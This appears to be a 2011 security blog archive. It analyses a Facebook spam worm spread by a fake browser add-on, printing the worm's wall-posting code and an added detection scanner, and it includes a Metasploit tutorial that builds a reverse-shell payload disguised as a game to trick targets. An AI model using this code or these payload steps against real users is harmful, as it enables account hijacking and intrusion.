Tuesday, December 13, 2011

Analysis of a Facebook spam exploited through browser add-ons

This whitepaper is an analysis of Facebook spam exploited through browser add-ons and extensions, which can be found as a PDF for download at

Though spam on Facebook is not new to us, I found this particular spam leveraged very smartly, and it was a very interesting analysis for me because I was surprised to see how far spammers can go. Today one of my friends on Facebook was very annoyed by this spam, which was posting on all his friends' walls and looked like this:

He asked me what to do. At first glance it looked just like every other spam, so I suggested the usual measures: remove all doubtful Facebook applications and clear the browser data. But it continued even after that, so I decided to look into it.
First the URL: the spam seemed to originate from http:// nwuuwiwiwiw.blogspot.com/. The blog looked like this:

Interesting! It needs a DivX plug-in, yet asks to install a “YouTube Premium” plugin (I wonder what “premium” would mean for YouTube!!).

So I decided to look into the page source; here is what it contained:

So this installs a browser add-on or extension depending on the browser. The else part of the code made sense to me, since it has to handle the case where the browser is neither Firefox nor Chrome; let's look at the PHP in the else part later. I downloaded the Firefox “YouTube” add-on and extracted it; youtube.js was the file to look into:

Navigating to it I found

another script, at http://mieneeueueu.co.cc/yt/extra.js. This one was finally the real script ;)
Now let's analyze this script.
Remember the else part in the first code snippet, which I promised to discuss later? It contained a link to http://mieneeueueu.co.cc/yt/video.php. The file extra.js also contains this part, which redirects the user to that URL after the add-on/extension is installed. Navigating to that link I found

This page actually contained the embedded video, so the victim must be happy to finally see it (the comments at the bottom, however, are not real: they are an image. Stupid and smart) ;)

As the person watches the video to the end, the script that steals the browser cookies gets enough time to spread the spam on all the friends' walls.

Further analyzing the code,

The code here assigns some random variables for the post so that it won't be identical on all the walls. Combining all the variables from post_form_id through var p3 yields a large number of possible posts (mathematical combinations put to use, smart eh?).

Looking into the main part of the code, where the message is generated and sent for posting:

for (var f = 0; f < b; f++) {
        if (a['payload']['entries'][f]['uid'] != user_id) {
            message = [randomValue(p1), a['payload']['entries'][f]['text']['substr'](0, a['payload']['entries'][f]['text']['indexOf'](' '))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](' ');
            var g = new XMLHttpRequest();
            d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
            title = '[VIDEO] Yeahh!! It happens on Live Television!';
            summary = 'Lol Checkout this video its very embracing moment for her';
            imagen = 'http://i.imgur.com/f9PE7.jpg';
            e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + a['payload']['entries'][f]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + summary + randomValue(p0) + '&attachment[params][url]=' + randomValue(video_url) + '&attachment[params][images]&attachment[params][images][src]=' + randomValue(domains) + '%26' + Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
            g['open']('POST', d, true);
            g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
            g['setRequestHeader']('Content-length', e['length']);
            g['setRequestHeader']('Connection', 'keep-alive');
            g['onreadystatechange'] = function () {};

Looking further into the above snippet, it is clear that it uses the grabbed cookies to post the spam on others' walls. The script also contained an unfinished part (maybe the spammer was happy with this for now, or was buying time from the user to finish the spam effectively) with a link to http://rihannaxgirlzke.blogspot.com/, which looked like this:

However, looking into the source, it didn't contain any script; rather, it was a static page whose content was actually an image file.
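The traits observed above (a second-stage script loaded from a remote host, the browser cookies being read, and a POST to Facebook's composer endpoint carrying the page's post_form_id and fb_dtsg tokens) are exactly what a reviewer would look for before trusting an unpacked add-on. The following is an added example, not code from the original post or from the extension analysed here: a small static scanner that scores an add-on's JavaScript against those indicators. The indicator ids, weights, threshold, allow-list and both sample inputs are constructed for this example; the remote host name in the suspicious sample is a placeholder.

```javascript
'use strict';

// Added example, not code from the original post. Each indicator is a regular
// expression over the add-on's source; ids, weights and the threshold are this
// example's own choices, modelled on the traits described in the analysis.
const INDICATORS = [
  { id: 'remote-script-load', weight: 3,
    re: /createElement\s*\(\s*['"]script['"]\s*\)|\.src\s*=\s*['"]https?:\/\/[^'"]+\.js/i },
  { id: 'cookie-access', weight: 3,
    re: /document\s*\.\s*cookie|\[\s*['"]cookie['"]\s*\]/ },
  { id: 'facebook-composer-post', weight: 4,
    re: /facebook\.com\/ajax\/[\w\/]*composer\.php/i },
  { id: 'csrf-token-reuse', weight: 2,
    re: /\bfb_dtsg\b|\bpost_form_id\b/ },
  { id: 'bracket-obfuscation', weight: 1,
    re: /\[\s*['"](open|send|setRequestHeader|join|random)['"]\s*\]/ },
];
const SUSPICIOUS_THRESHOLD = 5;

// Hosts a YouTube helper add-on could legitimately contact (constructed allow-list).
const ALLOWED_HOSTS = new Set(['www.youtube.com', 's.ytimg.com']);

// Collect every host that appears in an absolute http(s) URL, in order of first appearance.
function extractRemoteHosts(source) {
  const hosts = [];
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = re.exec(source)) !== null) {
    const host = m[1].toLowerCase();
    if (!hosts.includes(host)) hosts.push(host);
  }
  return hosts;
}

// Return the matched indicator ids, a weighted score, the hosts outside the
// allow-list and a verdict for one add-on source file.
function scanAddonSource(source) {
  const matched = INDICATORS.filter(ind => ind.re.test(source));
  const score = matched.reduce((sum, ind) => sum + ind.weight, 0);
  const unexpectedHosts = extractRemoteHosts(source).filter(h => !ALLOWED_HOSTS.has(h));
  return {
    hits: matched.map(ind => ind.id),
    score,
    unexpectedHosts,
    verdict: score >= SUSPICIOUS_THRESHOLD ? 'suspicious' : 'clean',
  };
}

// Constructed samples. The second mirrors the structure of the script in the
// post (remote extra.js, cookie read, composer.php POST with the CSRF tokens)
// without its payload; "second-stage.example" is a placeholder host.
const BENIGN_SAMPLE = [
  "var player = document.getElementById('player');",
  "player.addEventListener('click', function () { player.classList.toggle('paused'); });",
  "var icon = new Image(); icon.src = 'https://s.ytimg.com/yt/favicon.ico';",
].join('\n');

const SUSPICIOUS_SAMPLE = [
  "var s = document.createElement('script');",
  "s.src = 'http://second-stage.example/yt/extra.js';",
  "document.body.appendChild(s);",
  "var c = document['cookie'];",
  "var g = new XMLHttpRequest();",
  "g['open']('POST', 'http://www.facebook.com/ajax/profile/composer.php?__a=1', true);",
  "var e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg;",
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, src] of [['benign', BENIGN_SAMPLE], ['suspicious', SUSPICIOUS_SAMPLE]]) {
    console.log(name, JSON.stringify(scanAddonSource(src)));
  }
}

if (typeof module !== 'undefined') {
  module.exports = { scanAddonSource, extractRemoteHosts, BENIGN_SAMPLE, SUSPICIOUS_SAMPLE };
}
```

Run it with node against any unpacked extension file by reading the file into a string and passing it to scanAddonSource; the benign sample scores 0, while the suspicious sample trips all five indicators and reports both hosts that are outside the allow-list. The host check is the part worth keeping even if the regexes are tuned away: an add-on that claims to be a YouTube helper has no business fetching scripts from an unrelated domain.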

Though social networking sites often fall prey to such scams and spam, much of it happens with the users' own consent, out of ignorance. Most of the time, looking closely at a post is enough to tell whether it is a genuine video from a valid link. In this case:

1. Looking at the post, the link from which the post originated is clearly youtube.com (underlined in black).
2. Further, the thumbnail preview for videos has changed: the play button is now transparent black, while the one in the spam we discussed had a blue play button (underlined in red).
3. Always install extensions from known sources:
   a. Chrome – from the Chrome Web Store
   b. Firefox – Mozilla Add-ons
4. Use add-ons like NoScript and No-Ads to avoid such scripts.
5. Stay away from scams/spam that promise some gift or money.

Saturday, October 29, 2011

Setting Up Android SDK in Eclipse on Windows

This tutorial contains a step-by-step procedure to set up the Android SDK on a Windows machine.

Please read the prerequisites and installation requirements of each software before proceeding.

Download the Android SDK from http://developer.android.com/sdk/index.html and install it.

You can install either of the two types available, .zip or .exe; as the site says, the .exe is preferable since it is easier.

After you install the Android SDK, download the latest Eclipse from http://www.eclipse.org/downloads/

Either of the following two is good for basic Android development

Unzip Eclipse (I assume you can set up Eclipse, the Java path, etc.)

Start Eclipse and install the Android Development Tools (ADT) via

Help >> Install New Software

and add the link https://dl-ssl.google.com/android/eclipse/ and name it ADT

Select Developer Tools and click Next. If you get an error in the next step like org.eclipse.wst.sse.core 0.0.0,

do the following; otherwise skip to the next step

1. Go to Help->Install New Software
2. Click on "Available Software Sites"
3. Tick the checkbox for http://download.eclipse.org/releases/indigo (for helios - Eclipse 3.7)

Then try installing the ADT again.

Just accept the license terms and finish the installation of ADT. It may show a few warnings regarding plugin verification; accept them and restart Eclipse after the installation.

After the restart you will see a popup like this

Select the path where the Android SDK was installed, or install a new SDK if you haven't done that before. Finish the installation and you should see the highlighted items in the Eclipse toolbar

That means you have successfully set up the Android SDK in Eclipse.

Now click on Android SDK Manager, select the Android platforms you want for your development, and install them as shown below

That is it !!!

Go ahead developing your android applications!

Thursday, September 29, 2011

Fix Windows Error While Installing : Cannot open registry key

Recently I was trying to install Microsoft Office 2010 as an upgrade over the existing Office 2007. It took too long, so I decided to stop the installation, uninstall 2007 manually and then do a fresh installation of 2010. However, when I tried to uninstall 2007 there was some issue and I was not able to remove it.

I tried manually deleting the Office 2007 files and also removing all its temp and reference files on the disk. This worked fine, but when I tried to install 2010 I got the following error:

setup cannot open the registry key Unknown/Component/xxxxxxxxxxxx make sure you have administrative rights..

That was annoying, as I realized that the registry permissions were screwed up. A little Google search told me that I had to get SubInACL [ Download ]. However, that meant I had to fix all the registry keys.
So I found a cool script on AddictiveTips by Ghaus Iftikar Nakodari. Here is what you do:

Copy the SubInACL.exe from the place it installed to C:\Windows\system32

Now write the following in Notepad and save it as registryfix.cmd

subinacl /subkeyreg HKEY_LOCAL_MACHINE /setowner=administrators
subinacl /subkeyreg HKEY_CURRENT_USER /setowner=administrators
subinacl /subkeyreg HKEY_CLASSES_ROOT /setowner=administrators
subinacl /subkeyreg HKEY_LOCAL_MACHINE /grant=administrators=f /grant=system=f
subinacl /subkeyreg HKEY_CURRENT_USER /grant=administrators=f /grant=system=f
subinacl /subkeyreg HKEY_CLASSES_ROOT /grant=administrators=f /grant=system=f
Right-click on the file and run it as administrator. It will take a while to fix all the registry keys; do not close or interrupt the process while it runs. Note that the script takes ownership of, and grants full control to Administrators and SYSTEM on, every key under the three hives listed, so take a backup of the registry before running it.

Ref :  

Thursday, August 18, 2011

Installing Matriux Krypton on Hard Disk / Virtual Box

I will guide you through a series of steps that will help you install Matriux on your hard disk or in VirtualBox.

If you are installing on a hard disk drive, scroll down to the instructions from "Step 6".

Follow this series of screenshots to install Matriux Krypton until I create a briefer tutorial and a video.

Step 1:

Start VirtualBox, click on "New", and select Operating System "Linux" and Version "Debian".

Step 2:

Allocate the RAM for the installation; anything more than 256 MB is good enough.

Step 3:

Create a virtual hard disk for the installation; usually more than 6 GB is fine (8 GB recommended). Select any type of virtual hard disk.

Step 4:

Set the hard disk size and the directory you want, or go with the defaults.

Step 5:

After these steps, start the virtual machine. Since it is the first time, it will prompt you to mount a disk image (ISO image). Browse to and locate the ISO image on your hard disk (the place where you downloaded Matriux Krypton).

Select the ISO on your hard disk or the DVD drive as the installation media.

This will start Matriux in Live mode.

Enter the password "toor" and log in.

Step 6:

Open a terminal and type gparted to start the GParted interface.

If it is new, unallocated space, then Device > Create Partition (if it is already used disk space, skip the next step and go straight to formatting it).

Step 7:

Select the disk space where you want to install Matriux and click New.

Click on "Add".

Click on the tick mark highlighted in the screenshot below and check "Apply",
then close GParted.

Step 8:

Now open a terminal and mount the partition we just created.
Type the following in the terminal:

mkdir /mnt/matriux
mount /dev/sda1 /mnt/matriux

Step 9:

Close the terminal and start the Matriux Disk Installer from the desktop. It should be easy for you now; it is a simple 7-step process with a few entries such as username, passwords and locale... that's it!!!

Step a:

Select the installation partition

Step b:

Choose if you want to install grub

Choose the disc for grub

Step c:

Type the username and passwords for root and user

Step d:

Select the locale you want (select en_US if you are not sure and prefer English)

Step e:

Confirm your settings and profile

The installer then proceeds for a few minutes of installing Matriux

Step f:

Congratulations, you have now installed Matriux. Reboot your system to boot into your new installation.

Happy Testing!!!!!! :D

Sunday, August 14, 2011

Matriux Krypton Launched

On the occasion of the 65th Independence Day, the Matriux Tiger Team is proud to present Matriux Krypton to the world.

We are young, but we are not virgins

Happy Independence Day India

Download at http://www.matriux.com/index.php?page=download

Friday, August 5, 2011

Matriux Krypton Launch

As we recently announced the release of Matriux, here is a video....

Proudly announcing the latest and most powerful security distribution, Matriux Krypton

Monday, August 1, 2011

Hacking Windows with Metasploit

TECHNOFREAKS: Hacking Windows with Metasploit: "We will have a brief tutorial, on metasploit multi/handler exploit using a meterpreter payload of reverse_tcp. Metasploit is a single m..."

Saturday, July 23, 2011

Hacking Windows with Metasploit

This is a brief tutorial on the Metasploit multi/handler exploit using a Meterpreter reverse_tcp payload.
Metasploit is the single most powerful open source tool available today for penetration testers. It can be used for developing and executing exploit code against a remote target machine, and it is a very famous and widely used penetration tester's choice.
Metasploit Framework has 4 interfaces to work with
1.       MSF command line
2.       MSF console
3.       MSF GUI
4.       Armitage (recently included along with the framework)
There was also a web-based version, which later became obsolete since it was buggy. msfconsole is the most widely used and powerful mode of the Metasploit framework.
Metasploit in Matriux:
My tutorial uses Matriux as the operating system, which can be found here: http://www.matriux.com/
The Metasploit framework is found in the Matriux Arsenal under Menu > Arsenal > Framework > Metasploit Framework.

Optionally it can be started from the terminal by typing msfconsole or msfgui based on what you prefer.

This is how the graphical interface typically looks

However, we will proceed with msfconsole, which I suggest is the most extensive mode for using the Metasploit framework.
Here we will have a brief walk-through of the multi/handler exploit using a Meterpreter reverse_tcp payload.
Start the Metasploit framework by typing “msfconsole” in the terminal, and also type “msfupdate” to update the framework.

Now, to start with multi/handler, we have to generate the exe bound to the Meterpreter reverse_tcp payload that we will share with the target Windows machines to exploit them. Open up a new terminal and type “msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1080 X > /home/matriux/angrybird.exe”
where LHOST = local host IP and LPORT = port to listen on

This will generate an angrybird.exe file in the home directory, as shown here. This file is to be shared with the target machines that we intend to exploit (you can fool your target by changing the icon of the generated exe file to make it look like an Angry Birds game file ;))

After sharing the file with the target, we wait for it to be executed. Meanwhile we start the reverse_tcp handler on our system. After starting msfconsole, we select the module with “use multi/handler” and set the payload by typing “set payload windows/meterpreter/reverse_tcp”.

Now set the options LHOST and LPORT by typing “set LHOST localIP” and “set LPORT port-to-listen”. Set them to match the exe payload we generated earlier; optionally, you can check the required options by typing “show options”.

We are now ready to exploit our target machine (here I set up a Windows XP machine). Initiate the listening process by typing “exploit” and wait for the target machine to execute angrybird.exe. As soon as the victim clicks on the executable, it will initialize the Meterpreter session over the reverse TCP connection.

BINGO, we are done!!! We successfully exploited a Windows XP machine with multi/handler.

And have you noticed? We just showed you a preview of Matriux's upcoming version ;) Ch33rs!!!

This article was earlier published by me in CHmag in the July 2011 Issue - http://chmag.in/